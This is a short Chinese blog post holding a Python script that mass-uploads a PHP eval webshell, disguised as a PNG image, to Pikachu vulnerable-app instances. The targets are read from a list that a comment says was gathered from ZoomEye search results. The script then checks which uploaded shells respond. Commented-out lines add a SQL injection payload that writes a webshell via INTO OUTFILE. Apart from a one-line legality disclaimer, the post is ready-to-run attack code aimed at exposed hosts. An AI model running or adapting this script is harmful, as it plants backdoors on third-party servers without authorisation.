python批量get pikachu的shell脚本模板

声明:工具仅用于技术交流，请勿违法

'''EXP : getshell use pikachu'''
import requests 
###############👇
path=r'D:\phpstudy_pro\WWW\UPLOAD\py\rouji\pikachu-data.txt' #地址列表文件位置 zoomeye前两页
###############👆
headers=[]
# re_getroot=re.compile(r'Password:(.*)</font>')
# class payloads:

        
#         rootdir='vul/unsafeupload/uploads/satori.php'
#         getroot=r'Less-2/?id=-1%20union%20select%201,2,@@datadir--+'
#         writeshell= rf'Less-2/?id=-1%20union select 1,"<?php eval($_REQUSET[1])?>",3 into outfile {rootdir}--+'
shelldir='vul/unsafeupload/uploads/satori.php'
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    "Cookie": "PHPSESSID=f7l8c2ev37d3n547bvh2nmgv29",
    "Connection": "close",
}
data = {
    "uploadfile": ("satori.php", "<?php\neval($_POST[\"pass\"]);\n", "image/png"),
    "submit": (None, "开始上传"),
}
address_list=[]
#初始化输入的地址函数👇
def addstr(url):
    def add_http_header(url):
        if not url.startswith('http://'):
            url = 'http://' + url
        return url
    def addxiegang(url):
        if not url.endswith('/'):
            url =url+'/'
        return url
    return addxiegang(add_http_header(url))

#读取地址列表👇
with open(path,'r',encoding='utf-8') as file:
    for line in file:
        address_list.append(addstr(line.replace("\n", "")))
#print(address_list)

#上传webshell函数
def upload_shell(address_list):
    for address in address_list:
        url=address+'vul/unsafeupload/servercheck.php'
        try:
            response = requests.post(url, headers=headers, files=data)
        except:
            pass
upload_shell(address_list)

#检验webshell函数
def check_shell(address_list):
    for address in address_list:
        url=address+shelldir
        try:
            response=requests.get(url)
            status_code=response.status_code
            if status_code==200:
                print(url)
        except:
            pass
        
check_shell(address_list)